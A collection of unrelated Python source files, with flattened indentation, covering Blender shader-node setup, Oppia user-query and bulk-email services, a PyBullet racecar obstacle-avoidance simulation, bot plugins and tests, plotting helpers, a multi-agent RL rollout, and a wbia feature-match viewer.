groupInputNode.location = Vector((UI_InputNodeXPosOffset, UI_InputNodeYPosOffset))
nodes = mat.node_tree.nodes
links = mat.node_tree.links
# Create the Mapping Node
mapping = nodes.new(type='ShaderNodeMapping')
mapping.location = Vector((groupNode.location[0] - UI_MappingXPosOffset, groupNode.location[1]))
mapping.width = UI_MappingWidth
# Create the UV Texture Coordinate node
textureInput = nodes.new(type='ShaderNodeTexCoord')
textureInput.location = mapping.location + Vector((UI_TexCoordXOffset, 0))
# Link the nodes
links.new(mapping.inputs[0], textureInput.outputs[2])
# Create frame around Mapping and TexCoord
frame = nodes.new(type='NodeFrame')
frame.label = 'Mapping'
mapping.parent = frame
textureInput.parent = frame
frame.update()
# create the input socket to the substance node and connect
groupNode.inputs.new('NodeSocketVector', UV_SOCKET_NAME)
links.new(groupNode.inputs[UV_SOCKET_NAME], mapping.outputs[0])
# link the UV mapping to all the texture nodes
for texNode in texNodes:
groupNode.node_tree.links.new(texNode.inputs['Vector'], groupInputNode.outputs[UV_SOCKET_NAME])
def DrawMappingUI(context, node_tree, xpos, ypos, newTexNodes, newValNodes):
""" Configure the graph for the substance group node """
# Create frame around tex coords and mapping
nodes = node_tree.nodes
# Create frame around texture nodes
if len(newTexNodes) > 0:
texFrame = nodes.new(type='NodeFrame')
texFrame.label = 'Textures'
for tnode in newTexNodes:
tnode.parent = texFrame
texFrame.update()
# place the value nodes together above the textures
if len(newValNodes) > 0:
valueFrame = nodes.new(type='NodeFrame')
valueFrame.label = 'Values'
yPos = texFrame.location[1] - UI_ValueNodeYOffset
for vNode in newValNodes:
vNode.location = Vector((UI_TextureXPosOffset, yPos))
yPos -= UI_ValueNodeYIncrement
vNode.parent = valueFrame
valueFrame.update()
return {'FINISHED'}
def SetTexNodeColorSpace(texNode):
""" set Base Color to sRGB and all others to Non-Color """
try:
if texNode.label == 'Base Color':
texNode.image.colorspace_settings.name = 'sRGB'
else:
texNode.image.colorspace_settings.name = 'Non-Color'
except Exception:
print('Non-Standard Color Space Detected -- Please manually select')
|
# coding: utf-8
#
# Copyright 2016 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Domain object for a parameters of a query."""
from __future__ import absolute_import # pylint: disable=import-only-modules
from __future__ import unicode_literals # pylint: disable=import-only-modules
from core.domain import email_manager
from core.domain import user_query_domain
from core.platform import models
(user_models,) = models.Registry.import_models([models.NAMES.user])
def _get_user_query_from_model(user_query_model):
"""Transform user query model to domain object.
Args:
user_query_model: UserQueryModel. The model to be converted.
Returns:
UserQuery. User query domain object.
"""
user_query_params = user_query_domain.UserQueryParams(
user_query_model.inactive_in_last_n_days,
user_query_model.has_not_logged_in_for_n_days,
user_query_model.created_at_least_n_exps,
user_query_model.created_fewer_than_n_exps,
user_query_model.edited_at_least_n_exps,
user_query_model.edited_fewer_than_n_exps
)
return user_query_domain.UserQuery(
user_query_model.id,
user_query_params,
user_query_model.submitter_id,
user_query_model.query_status,
user_query_model.user_ids,
user_query_model.sent_email_model_id,
user_query_model.created_on,
user_query_model.deleted,
)
def get_user_query(query_id, strict=False):
"""Gets the user query with some ID.
Args:
query_id: str. The ID of the query.
strict: bool. Whether to raise an error if the user query doesn't exist.
Returns:
UserQuery. The user query.
"""
user_query_model = user_models.UserQueryModel.get(query_id, strict=strict)
return (
_get_user_query_from_model(user_query_model)
if user_query_model else None
)
def get_recent_user_queries(num_queries_to_fetch, cursor):
"""Get recent user queries.
Args:
num_queries_to_fetch: int. Number of user queries to fetch.
cursor: str|None. The list of returned entities starts from this
datastore cursor. Can be None if there are no more entities.
Returns:
tuple(list(QueryModel), str). Returns tuple with the list of user
queries and the next cursor that can be used when doing subsequent
queries.
"""
user_query_models, next_cursor, _ = user_models.UserQueryModel.fetch_page(
num_queries_to_fetch, cursor)
return (
[_get_user_query_from_model(model) for model in user_query_models],
next_cursor
)
def _save_user_query(user_query):
"""Save the user query into the datastore.
Args:
user_query: UserQuery. The user query to save.
Returns:
str. The ID of the user query that was saved.
"""
user_query.validate()
user_query_dict = {
'inactive_in_last_n_days': user_query.params.inactive_in_last_n_days,
'has_not_logged_in_for_n_days': (
user_query.params.has_not_logged_in_for_n_days),
'created_at_least_n_exps': user_query.params.created_at_least_n_exps,
'created_fewer_than_n_exps': (
user_query.params.created_fewer_than_n_exps),
'edited_at_least_n_exps': user_query.params.edited_at_least_n_exps,
'edited_fewer_than_n_exps': user_query.params.edited_fewer_than_n_exps,
'submitter_id': user_query.submitter_id,
'query_status': user_query.status,
'user_ids': user_query.user_ids,
'sent_email_model_id': user_query.sent_email_model_id,
'deleted': user_query.deleted
}
user_query_model = (
user_models.UserQueryModel.get(user_query.id, strict=False))
if user_query_model is not None:
user_query_model.populate(**user_query_dict)
else:
user_query_dict['id'] = user_query.id
user_query_model = user_models.UserQueryModel(**user_query_dict)
user_query_model.put()
return user_query_model.id
def save_new_user_query(
submitter_id, inactive_in_last_n_days=None,
has_not_logged_in_for_n_days=None, created_at_least_n_exps=None,
created_fewer_than_n_exps=None, edited_at_least_n_exps=None,
edited_fewer_than_n_exps=None):
"""Saves a new user query.
Args:
submitter_id: str. ID of the UserQueryModel instance.
inactive_in_last_n_days: int. Number of days user is inactive.
has_not_logged_in_for_n_days: int. Number of days user hasn't logged in.
created_at_least_n_exps: int. Minimum number of explorations created
by user.
created_fewer_than_n_exps: int. Maximum number of explorations created
by user.
edited_at_least_n_exps: int|None. Minimum number of
explorations edited by user.
edited_fewer_than_n_exps: int|None. Maximum number of
explorations edited by user.
Returns:
str. The ID of the newly saved user query.
"""
query_id = user_models.UserQueryModel.get_new_id('')
user_query_params = user_query_domain.UserQueryParams(
inactive_in_last_n_days=inactive_in_last_n_days,
has_not_logged_in_for_n_days=has_not_logged_in_for_n_days,
created_at_least_n_exps=created_at_least_n_exps,
created_fewer_than_n_exps=created_fewer_than_n_exps,
edited_at_least_n_exps=edited_at_least_n_exps,
edited_fewer_than_n_exps=edited_fewer_than_n_exps
)
user_query = (
user_query_domain.UserQuery.create_default(
query_id, user_query_params, submitter_id))
return _save_user_query(user_query)
def archive_user_query(user_query_id):
"""Delete the user query.
Args:
user_query_id: str. The ID of the user query to delete.
"""
user_query = get_user_query(user_query_id, strict=True)
user_query.archive()
_save_user_query(user_query)
def send_email_to_qualified_users(
query_id, email_subject, email_body, email_intent, max_recipients):
"""Send email to maximum 'max_recipients' qualified users.
Args:
query_id: str. ID of the UserQueryModel instance.
email_subject: str. Subject of the email to be sent.
email_body: str. Body of the email to be sent.
email_intent: str. Intent of the email.
max_recipients: int. Maximum number of recipients send emails to.
"""
user_query = get_user_query(query_id, strict=True)
recipient_ids = user_query.user_ids
if max_recipients:
recipient_ids = recipient_ids[:max_recipients]
bulk_email_model_id = email_manager.send_user_query_email(
user_query.submitter_id, recipient_ids, email_subject,
email_body, email_intent
)
user_query.archive(sent_email_model_id=bulk_email_model_id)
_save_user_query(user_query)
# Store BulkEmailModel in UserBulkEmailsModel of each recipient.
for recipient_id in recipient_ids:
recipient_bulk_email_model = (
user_models.UserBulkEmailsModel.get(recipient_id, strict=False))
if recipient_bulk_email_model is None:
recipient_bulk_email_model = user_models.UserBulkEmailsModel(
id=recipient_id, sent_email_model_ids=[])
recipient_bulk_email_model.sent_email_model_ids.append(
bulk_email_model_id)
recipient_bulk_email_model.put()
|
import os, inspect
currentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
print ("current_dir=" + currentdir)
parentdir = os.path.join(currentdir,"../gym")
os.sys.path.insert(0,parentdir)
import pybullet as p
import pybullet_data
import time
import csv
#########---------------START Obstacle Avoidance----------########
import math
import numpy as np
import random
import matplotlib.pyplot as plt
class __Path:
def __init__(self):
self.len = 0
self.curr = None
self.rad = 0
def calcDist(self, pos):
if self.curr is not None:
prev = self.curr
self.curr = pos
dist = np.linalg.norm(pos-prev)
self.len = self.len + dist
self.rad = np.linalg.norm(pos-self.start)
else:
self.start = pos
self.curr = pos
class __Data:
def __init__(self, row_i, start_i, end_i, n):
self.row_i = row_i
self.start_i = start_i
self.end_i = end_i
self.n = n
self.gap = None
def compareGap(self, s, f):
g = self.gap
if g is not None:
return g[1]-g[0] < f-s
else:
return True
def setGap(self, s, f):
g = self.gap
if g is None:
self.gap = (s, f)
else:
if f-s > g[1]-g[0]:
self.gap = (s, f)
def __addNextRow(row, start, finish, data):
if row == data.n:
data.setGap(start, finish)
return
args = np.argwhere(data.row_i == row)
for i in args:
s = start
f = finish
c = data.start_i[i][0]
d = data.end_i[i][0]
if s < d and f > c:
if s < c:
s = c
if f > d:
f = d
if data.compareGap(s, f):
__addNextRow(row+1, s, f, data)
return
def find_largest_gap(collisions):
depth = collisions < 0 # true where gap exists
npad = ((0, 0), (1, 1))
d = np.pad(depth, pad_width=npad, mode='constant', constant_values=0)
f = np.nonzero(np.diff(d))
r = f[0][0::2] # row indices
data = __Data(r, f[1][0::2], f[1][1::2], len(np.unique(r)))
__addNextRow(0, 0, np.inf, data)
sf = data.gap
if sf is None or sf[1] == np.inf:
return None
return (sf[0]+sf[1])/2
#########---------------END Obstacle Avoidance----------########
#########---------------START Random Obstacles----------########
def random_environment(blocks, r):
ran = list(range(-r,1)) + list(range(1, r+1))
R1, R2 = np.meshgrid(ran, ran)
idx = np.random.permutation(R1.size)
r1 = R1.flatten()[idx]
r2 = R2.flatten()[idx]
for i in range(blocks):
randlist = [r1[i], r2[i],0]
if all(abs(i) < 2 for i in randlist):
continue
p.createMultiBody(0,cube, baseOrientation=orn, basePosition=randlist)
#########---------------END Random Obstacles----------########
with open('rc_output.csv', 'w+') as f:
writer = csv.writer(f, quoting=csv.QUOTE_NONNUMERIC)
writer.writerow( ('Distance Travelled', 'Radial DIstance', 'Deadend', 'Blocks', 'Radius') )
while True:
cid = p.connect(p.SHARED_MEMORY)
if (cid<0):
# p.connect(p.GUI)
p.connect(p.DIRECT)
p.setPhysicsEngineParameter(numSolverIterations=5, fixedTimeStep=1.,
numSubSteps=50)
p.resetSimulation()
p.setGravity(0,0,-10)
useRealTimeSim = False
cube =p.createCollisionShape(p.GEOM_MESH,fileName=os.path.join(pybullet_data.getDataPath(),"cube.obj"),flags=p.GEOM_FORCE_CONCAVE_TRIMESH, meshScale=[1,1,1])
orn = p.getQuaternionFromEuler([0,0,0])
radius = 10
blocks = 125
random_environment(blocks, radius)
p.setRealTimeSimulation(useRealTimeSim) # either this
p.loadURDF(os.path.join(pybullet_data.getDataPath(),"plane.urdf"))
car = p.loadURDF(os.path.join(pybullet_data.getDataPath(),"racecar/racecar.urdf"))
# for i in range (p.getNumJoints(car)):
# print (p.getJointInfo(car,i))
inactive_wheels = [5,7]
wheels = [2,3]
for wheel in inactive_wheels:
p.setJointMotorControl2(car,wheel,p.VELOCITY_CONTROL,targetVelocity=0,force=0)
steering = [4,6]
targetVelocitySlider = p.addUserDebugParameter("wheelVelocity",-10,10,0)
maxForceSlider = p.addUserDebugParameter("maxForce",0,10,10)
steeringSlider = p.addUserDebugParameter("steering",-0.5,0.5,0)
ray_length = 2
angle_swept = 60
step = math.ceil(100*angle_swept/p.MAX_RAY_INTERSECTION_BATCH_SIZE)/100
angles = np.arange(-angle_swept/2, angle_swept/2, step) * np.pi / 180 #angle of rotations
num_rays = np.shape(angles)[0]
rays = np.concatenate(([ray_length*np.sin(angles)], [ray_length*np.cos(angles)], [np.zeros(num_rays)]), axis=0)
rot = np.array([[0, -1, 0], [1, 0, 0], [0, 0, 0]])
offset = np.array([0, 0, 0.3])
count = 0
nowhere_count = 0
path = __Path()
nowhere = False
while (path.rad < radius + .5):
# maxForce = p.readUserDebugParameter(maxForceSlider)
# targetVelocity = p.readUserDebugParameter(targetVelocitySlider)
# steeringAngle = p.readUserDebugParameter(steeringSlider)
maxForce = 10.
targetVelocity = -5
steeringAngle = 0
#########---------------START Obstacle Avoidance----------########
position, orientation = p.getBasePositionAndOrientation(car)
matrix = p.getMatrixFromQuaternion(orientation)
matrix = np.reshape(matrix, (3, 3))
src = np.array(position)
src = src + np.matmul(matrix,offset)
path.calcDist(src)
h = 10
rays_src = np.repeat([src], num_rays, axis=0)
orn = np.matmul(matrix, rot) #rotates unit vector y to -x
rays_end = np.matmul(orn, rays) # unit vector in direction of minitaur
rays_end = (rays_end + src[:, None]).T
rays_info = p.rayTestBatch(rays_src.tolist(), rays_end.tolist())
b = np.asarray([int(i[0]) for i in rays_info])
for i in range(h-1):
rays = np.concatenate(([ray_length*np.sin(angles)], [ray_length*np.cos(angles)], [np.full((num_rays,), i+1)]), axis=0)
rays_end = np.matmul(orn, rays) # unit vector in direction of minitaur
rays_end = (rays_end + src[:, None]).T
rays_info = p.rayTestBatch(rays_src.tolist(), rays_end.tolist())
b = np.vstack((b, np.asarray([int(i[0]) for i in rays_info])))
nth_ray = find_largest_gap(b)
if(nth_ray == None):
nowhere = True
targetVelocity = 0
# print("Nowhere")
nowhere_count += 1
if nowhere_count > 20:
break
else:
nowhere_count = 0
deg = 1.*angle_swept*nth_ray/b.shape[1] - angle_swept/2.
# print("Rotate {:.1f} degrees".format(deg))
if math.fabs(deg) > 5:
targetVelocity = -4
steeringAngle = np.sign(deg)*.7
#########---------------END Obstacle Avoidance----------########
for wheel in wheels:
p.setJointMotorControl2(car,wheel,p.VELOCITY_CONTROL,targetVelocity=targetVelocity,force=maxForce)
for steer in steering:
p.setJointMotorControl2(car,steer,p.POSITION_CONTROL,targetPosition=steeringAngle)
if (useRealTimeSim==0):
p.stepSimulation()
time.sleep(0.01)
count += 1
writer.writerow( (path.len, path.rad, nowhere, blocks, radius) )
# print("Dist Travelled: {}\n radial: {}\n deadend: {}\n \
# blocks: {}\n radius: {}".format(path.len, path.rad,
# nowhere, blocks, radius))
# collision, distance? mag or actual, deadend, time,
|
# coding=utf-8
from tgbot import plugintest
from plugin_examples.bold import BoldPlugin
class AdminPluginTest(plugintest.PluginTestCase):
def setUp(self):
self.bot = self.fake_bot('', inline_query=BoldPlugin())
def test_inline(self):
self.receive_inline(u'hello')
results = self.pop_reply()[1]['results']
self.assertEqual(results[0]['title'], 'Bold')
self.assertEqual(results[0]['message_text'], '*hello*')
self.assertEqual(results[1]['title'], 'Italic')
self.assertEqual(results[1]['message_text'], '_hello_')
self.assertEqual(results[2]['title'], 'Fixedsys')
self.assertEqual(results[2]['message_text'], '`hello`')
self.assertEqual(results[3]['title'], 'Pre-Rendered')
self.assertEqual(results[3]['message_text'], 'hello')
|
'''Helper for plotting reblocking plots.'''
# copyright: (c) 2015 James Spencer
# license: modified BSD license; see LICENSE for further details.
import matplotlib.pyplot as plt
def plot_reblocking(block_info, plotfile=None, plotshow=True):
'''Plot the reblocking data.
Parameters
----------
block_info : :class:`pandas.DataFrame`
Reblocking data (i.e. the first item of the tuple returned by ``reblock``).
plotfile : string
If not null, save the plot to the given filename. If '-', then show the
plot interactively. See also ``plotshow``.
plotshow : bool
If ``plotfile`` is not given or is '-', then show the plot interactively.
Returns
-------
fig : :class:`matplotlib.figure.Figure`
plot of the reblocking data.
'''
fig = plt.figure()
data_sets = block_info.columns.get_level_values(0).unique()
for (i, col) in enumerate(data_sets):
ax = fig.add_subplot(len(data_sets), 1, i+1)
# There should only be (at most) one non-null value for optimal block.
opt = block_info[block_info[(col,'optimal block')] != ''].index.values
if opt:
opt = opt[0]
std_err = block_info[(col, 'standard error')]
if 'standard error error' in block_info[col]:
std_err_err = block_info[(col, 'standard error error')]
else:
std_err_err = 0*std_err
line = ax.errorbar(block_info.index, std_err, std_err_err, marker='o',
label=col)
if opt:
ax.annotate('', (opt, std_err[opt]-std_err_err[opt]),
xytext=(0, -20), textcoords='offset points',
arrowprops=dict(
arrowstyle="->", #color=line[0].get_color()
linewidth=1.2*line[0].get_linewidth(),
),)
ax.legend(loc=2)
ax.set_ylabel('standard error')
ax.set_xlabel('Reblock iteration')
size = fig.get_size_inches()
fig.set_size_inches(size[0], size[1]*len(data_sets))
fig.tight_layout()
if plotfile == '-' or (not plotfile and plotshow):
plt.show()
elif plotfile:
fig.savefig(plotfile)
return fig
|
import numpy as np
from rlkit.torch.core import eval_np
def marollout(
env,
agent_n,
max_path_length=np.inf,
render=False,
render_kwargs=None,
shared_obs=False,
shared_encoder=None,
shared_groups=None,
collect_raw_actions=False,
):
"""
The following value for the following keys will be a 2D array, with the
first dimension corresponding to the time dimension.
- observations
- actions
- rewards
- next_observations
- terminals
The next two elements will be lists of dictionaries, with the index into
the list being the index into the time
- agent_infos
- env_infos
"""
if render_kwargs is None:
render_kwargs = {}
num_agent = len(agent_n)
observations = []
actions = []
if collect_raw_actions:
raw_actions = []
rewards = []
terminals = []
agent_infos = []
env_infos = []
# env_infos = dict()
o_n = env.reset()
[agent.reset() for agent in agent_n]
next_o = None
path_length = 0
if render:
env.render(**render_kwargs)
while path_length < max_path_length:
a_n, agent_info_n = [],{}
if collect_raw_actions:
ra_n = []
if shared_encoder:
if shared_groups:
o_emb_n = [eval_np(sub_shared_encoder,o_n[None,:])[0] for sub_shared_encoder in shared_encoder]
else:
o_emb_n = eval_np(shared_encoder,o_n[None,:])[0]
for i,agent in enumerate(agent_n):
if shared_encoder:
if shared_groups:
o = o_emb_n[shared_groups[i]][i]
else:
o = o_emb_n[i]
elif shared_obs:
o = o_n
else:
o = o_n[i]
a, agent_info = agent.get_action(o)
a_n.append(a)
for key in agent_info.keys():
agent_info_n[key+' '+str(i)] = agent_info[key]
if collect_raw_actions:
ra_n.append(agent_info['raw_action'])
next_o_n, r_n, d_n, env_info = env.step(a_n)
observations.append(o_n)
rewards.append(r_n)
terminals.append(d_n)
actions.append(a_n)
if collect_raw_actions:
raw_actions.append(ra_n)
agent_infos.append(agent_info_n)
env_infos.append(env_info)
# for key in env_info.keys():
# if key in env_infos.keys():
# env_infos[key].append(env_info[key])
# else:
# env_infos[key] = [env_info[key]]
path_length += 1
if d_n.all():
break
o_n = next_o_n
if render:
env.render(**render_kwargs)
actions = np.array(actions)
if len(actions.shape) == 2:
actions = np.expand_dims(actions, 2)
if collect_raw_actions:
raw_actions = np.array(raw_actions)
if len(raw_actions.shape) == 2:
raw_actions = np.expand_dims(raw_actions, 2)
observations = np.array(observations)
if not shared_obs:
if len(observations.shape) == 2:
observations = np.expand_dims(observations, 2)
next_o_n = np.array(next_o_n)
if len(next_o_n.shape) == 1:
next_o_n = np.expand_dims(next_o_n, 1)
next_observations = np.vstack(
(
observations[1:, :, :],
np.expand_dims(next_o_n, 0)
)
)
else:
next_observations = np.vstack(
(
observations[1:, :],
np.expand_dims(next_o_n, 0)
)
)
path = dict(
observations=observations,
actions=actions,
rewards=np.array(rewards).reshape(-1, num_agent, 1),
next_observations=next_observations,
terminals=np.array(terminals).reshape(-1, num_agent, 1),
agent_infos=agent_infos,
env_infos=env_infos,
)
if collect_raw_actions:
path['raw_actions'] = raw_actions
return path |
# we are using webcam .
import cv2
import numpy as np
cap = cv2.VideoCapture(0) # we are accessing first webcam of the system
# cap = cv2.VideoCapture(1) # to access for second webcam
while True:
ret , frame = cap.read()
cv2.imshow ('WebCam',frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
cap.release() # this releases the 'capture' so that camera will be released
cv2.destroyAllWindows() # to close all the window
|
import discord, sqlite3, asyncio
from discord.ext import commands
from discord_slash import cog_ext, SlashContext
from discord_slash.utils.manage_commands import create_option
class Slash(commands.Cog):
def __init__(self, bot):
self.bot = bot
@cog_ext.cog_slash(name="pollend", description="Terminer un sondage", options=[
create_option(
name="id_du_sondage",
description="L'identifiant du sondage (qui est celui du sondage envoyé par le bot)",
option_type=3,
required=True
)
])
async def _pollend(self, ctx, id_du_sondage: str):
connection = sqlite3.connect("iso_card.db")
cursor = connection.cursor()
try:
id_du_sondage = int(id_du_sondage)
except:
pass
id_du_sondage = (f"{id_du_sondage}",)
cursor.execute('SELECT * FROM polls WHERE message_id = ?', id_du_sondage)
poll_values = cursor.fetchone()
if poll_values == None:
await ctx.send(f"{ctx.author.mention} Désolé mais le sondage que tu recherches n'a pas été retrouvé... essaie de voir si tu as entré le bon identifiant, ou si le sondage n'a pas déjà été terminé :wink:")
else:
channel_to_find = self.bot.get_channel(poll_values[1])
try:
msg = await channel_to_find.fetch_message(poll_values[0])
except:
pass
poll_title = poll_values[2]
poll_arguments = poll_values[3].split("\n")
n, bs_n, numbers = 0, "\n", ['1️⃣', '2️⃣', '3️⃣', '4️⃣', '5️⃣', '6️⃣', '7️⃣', '8️⃣', '9️⃣', '🔟']
for reaction in msg.reactions:
poll_arguments[n] = str(poll_arguments[n]) + f" • x{int(reaction.count) - 1}"
n += 1
poll_arguments = bs_n.join(poll_arguments)
embed = discord.Embed(title=f"{poll_title} (terminé)", description=ctx.author.mention)
embed.add_field(name="** **", value=poll_arguments, inline=False)
await msg.edit(embed=embed, content=None)
message_id = (f"{msg.id}",)
cursor.execute('DELETE FROM polls WHERE message_id = ?', message_id)
connection.commit()
msg = await ctx.send(":white_check_mark:")
await asyncio.sleep(1)
await msg.delete()
connection.close()
def setup(bot):
bot.add_cog(Slash(bot))
def teardown(bot):
bot.remove_cog("pollend") |
# -*- coding: utf-8 -*-
"""
Unfinished non-wbia dependent version of interact matches
"""
import utool as ut
import numpy as np
from wbia.plottool import abstract_interaction
BASE_CLASS = abstract_interaction.AbstractInteraction
# TODO: move to plottool and decouple with IBEIS
# TODO: abstract interaction
@ut.reloadable_class
class MatchInteraction2(BASE_CLASS):
"""
TODO: replace functional version with this class
Plots a chip result and sets up callbacks for interaction.
SeeAlso:
wbia.viz.interact.interact_matches.MatchInteraction
CommandLine:
python -m wbia.plottool.interact_matches --test-MatchInteraction2 --show
Example:
>>> # xdoctest: +REQUIRES(module:wbia, --slow)
>>> from wbia.plottool.interact_matches import * # NOQA
>>> import wbia
>>> # build test data
>>> ibs = wbia.opendb('testdb1')
>>> qreq_ = ibs.new_query_request([1], [2, 3, 4, 5], cfgdict=dict(query_rotation_heuristic=True))
>>> cm = qreq_.execute()[0]
>>> qaid = cm.qaid
>>> daid = cm.get_top_aids()[0]
>>> rchip1 = ibs.get_annot_chips([qaid], config2_=qreq_.extern_query_config2)[0]
>>> rchip2 = ibs.get_annot_chips([daid], config2_=qreq_.extern_data_config2)[0]
>>> kpts1 = ibs.get_annot_kpts([qaid], config2_=qreq_.extern_query_config2)[0]
>>> kpts2 = ibs.get_annot_kpts([daid], config2_=qreq_.extern_data_config2)[0]
>>> vecs1 = ibs.get_annot_vecs([qaid], config2_=qreq_.extern_query_config2)[0]
>>> vecs2 = ibs.get_annot_vecs([daid], config2_=qreq_.extern_data_config2)[0]
>>> fm = cm.aid2_fm[daid]
>>> fs = cm.aid2_fs[daid]
>>> fsv = cm.aid2_fsv[daid]
>>> H1 = cm.aid2_H[daid]
>>> self = MatchInteraction2(rchip1, rchip2, kpts1, kpts2, fm, fs, fsv,
>>> vecs1, vecs2, H1)
>>> self.show_page()
>>> import wbia.plottool as pt
>>> pt.show_if_requested()
"""
def __init__(
self,
rchip1,
rchip2,
kpts1,
kpts2,
fm,
fs,
fsv,
vecs1,
vecs2,
H1=None,
H2=None,
fnum=None,
**kwargs
):
import wbia.plottool as pt
kwargs = kwargs.copy()
# Drawing Data
self.rchip1 = rchip1
self.rchip2 = rchip2
self.kpts1 = kpts1
self.kpts2 = kpts2
self.fm = fm
self.fs = fs
self.fk = kwargs.pop('fk', None)
self.fsv = fsv
self.vecs1 = vecs1
self.vecs2 = vecs2
self.H1 = H1
self.H2 = H2
# Drawing settings
self.warp_homog = False
self.mode = kwargs.pop('mode', 0)
self.mx = kwargs.pop('mx', None)
self.vert = kwargs.pop('vert', None)
self.same_fig = kwargs.get('same_fig', True)
self.last_fx = 0
# self.figtitle = kwargs.get('figtitle', 'Inspect Matches')
self.xywh2 = None
self.fnum2 = pt.ensure_fnum(fnum)
self.title = kwargs.get('title', True)
self.truth = kwargs.pop('truth', None)
# self.fnum2 = pt.next_fnum()
# if BASE_CLASS is not object:
kwargs['interaction_name'] = 'matches'
super(MatchInteraction2, self).__init__(**kwargs)
# self.begin(**kwargs)
def plot(self, *args, **kwargs):
self.chipmatch_view(*args, **kwargs)
def chipmatch_view(self, fnum=None, pnum=(1, 1, 1), verbose=None, **kwargs_):
"""
just visualizes the matches using some type of lines
"""
import wbia.plottool as pt
from wbia.plottool import plot_helpers as ph
if fnum is None:
fnum = self.fnum
if verbose is None:
verbose = ut.VERBOSE
if verbose:
print('-- CHIPMATCH VIEW --')
print('[ichipmatch_view] self.mode = %r' % (self.mode,))
mode = kwargs_.get('mode', self.mode)
draw_ell = mode >= 1
draw_lines = mode == 2
if verbose:
print('[ichipmatch_view] draw_lines = %r' % (draw_lines,))
print('[ichipmatch_view] draw_ell = %r' % (draw_ell,))
# pt.figure(fnum=fnum, docla=True, doclf=True)
# NOTE: i remove the clf here. might cause issues
pt.figure(fnum=fnum, docla=True, doclf=False)
# show_matches_kw = self.__dict__.copy()
show_matches_kw = dict(
# fnum=fnum, pnum=pnum,
draw_lines=draw_lines,
draw_ell=draw_ell,
colorbar_=True,
vert=self.vert,
white_background=False,
)
show_matches_kw.update(kwargs_)
if verbose:
print('self.warp_homog = %r' % (self.warp_homog,))
if self.warp_homog:
show_matches_kw['H1'] = self.H1
show_matches_kw['H2'] = self.H2
if verbose:
print('show_matches_kw = %s' % (ut.repr2(show_matches_kw, truncate=True)))
# tup = show_matches(fm, fs, **show_matches_kw)
ax, xywh1, xywh2 = pt.show_chipmatch2(
self.rchip1,
self.rchip2,
self.kpts1,
self.kpts2,
fm=self.fm,
fs=self.fs,
pnum=pnum,
**show_matches_kw
)
self.xywh2 = xywh2
ph.set_plotdat(ax, 'viztype', 'matches')
if self.truth is not None and self.truth:
truth_color = pt.TRUE_BLUE # if else pt.FALSE_RED
pt.draw_border(ax, color=truth_color, lw=4)
if self.title is not None:
pt.set_title(self.title, ax=ax)
# pt.set_figtitle(figtitle + ' ' + vh.get_vsstr(qaid, aid))
# Draw clicked selection
def select_ith_match(self, mx):
"""
Selects the ith match and visualizes and prints information concerning
features weights, keypoint details, and sift descriptions
"""
import wbia.plottool as pt
from wbia.plottool import viz_featrow
from wbia.plottool import interact_helpers as ih
fnum = self.fnum
same_fig = self.same_fig
rchip1 = self.rchip1
rchip2 = self.rchip2
self.mx = mx
print('+--- SELECT --- ')
print('... selecting mx-th=%r feature match' % mx)
fsv = self.fsv
fs = self.fs
print('score stats:')
print(ut.repr2(ut.get_stats(fsv, axis=0), nl=1))
print('fsv[mx] = %r' % (fsv[mx],))
print('fs[mx] = %r' % (fs[mx],))
# ----------------------
# Get info for the select_ith_match plot
self.mode = 1
# Get the mx-th feature match
fx1, fx2 = self.fm[mx]
# Older info
fscore2 = self.fs[mx]
fk2 = None if self.fk is None else self.fk[mx]
kp1, kp2 = self.kpts1[fx1], self.kpts2[fx2]
vecs1, vecs2 = self.vecs1[fx1], self.vecs2[fx2]
info1 = '\nquery'
info2 = '\nk=%r fscore=%r' % (fk2, fscore2)
# self.last_fx = fx1
self.last_fx = fx1
# Extracted keypoints to draw
extracted_list = [
(rchip1, kp1, vecs1, fx1, 'aid1', info1),
(rchip2, kp2, vecs2, fx2, 'aid2', info2),
]
# Normalizng Keypoint
# if hasattr(cm, 'filt2_meta') and 'lnbnn' in cm.filt2_meta:
# qfx2_norm = cm.filt2_meta['lnbnn']
# # Normalizing chip and feature
# (aid3, fx3, normk) = qfx2_norm[fx1]
# rchip3 = ibs.get_annot_chips(aid3)
# kp3 = ibs.get_annot_kpts(aid3)[fx3]
# sift3 = ibs.get_annot_vecs(aid3)[fx3]
# info3 = '\nnorm %s k=%r' % (vh.get_aidstrs(aid3), normk)
# extracted_list.append((rchip3, kp3, sift3, fx3, aid3, info3))
# else:
# pass
# #print('WARNING: meta doesnt exist')
# ----------------------
# Draw the select_ith_match plot
nRows, nCols = len(extracted_list) + same_fig, 3
# Draw matching chips and features
sel_fm = np.array([(fx1, fx2)])
pnum1 = (nRows, 1, 1) if same_fig else (1, 1, 1)
vert = self.vert if self.vert is not None else False
self.chipmatch_view(
pnum=pnum1,
ell_alpha=0.4,
ell_linewidth=1.8,
colors=pt.BLUE,
sel_fm=sel_fm,
vert=vert,
)
# Draw selected feature matches
px = nCols * same_fig # plot offset
prevsift = None
if not same_fig:
# fnum2 = fnum + len(viz.FNUMS)
fnum2 = self.fnum2
fig2 = pt.figure(fnum=fnum2, docla=True, doclf=True)
else:
fnum2 = fnum
for (rchip, kp, sift, fx, aid, info) in extracted_list:
px = viz_featrow.draw_feat_row(
rchip,
fx,
kp,
sift,
fnum2,
nRows,
nCols,
px,
prevsift=prevsift,
aid=aid,
info=info,
)
prevsift = sift
if not same_fig:
ih.connect_callback(fig2, 'button_press_event', self.on_click)
# pt.set_figtitle(figtitle + vh.get_vsstr(qaid, aid))
# Callback
def on_click_inside(self, event, ax):
from wbia.plottool import plot_helpers as ph
(x, y) = (event.xdata, event.ydata)
viztype = ph.get_plotdat(ax, 'viztype', '')
if event.button == 3:
self.show_popup_menu(self.get_popup_options(), event)
return
# key = '' if event.key is None else event.key
# ctrl_down = key.find('control') == 0
if viztype in ['matches', 'multi_match']:
if len(self.fm) == 0:
print('[inter] no feature matches to click')
else:
# Normal Click
# Select nearest feature match to the click
kpts1_m = self.kpts1[self.fm[:, 0]]
kpts2_m = self.kpts2[self.fm[:, 1]]
x2, y2, w2, h2 = self.xywh2
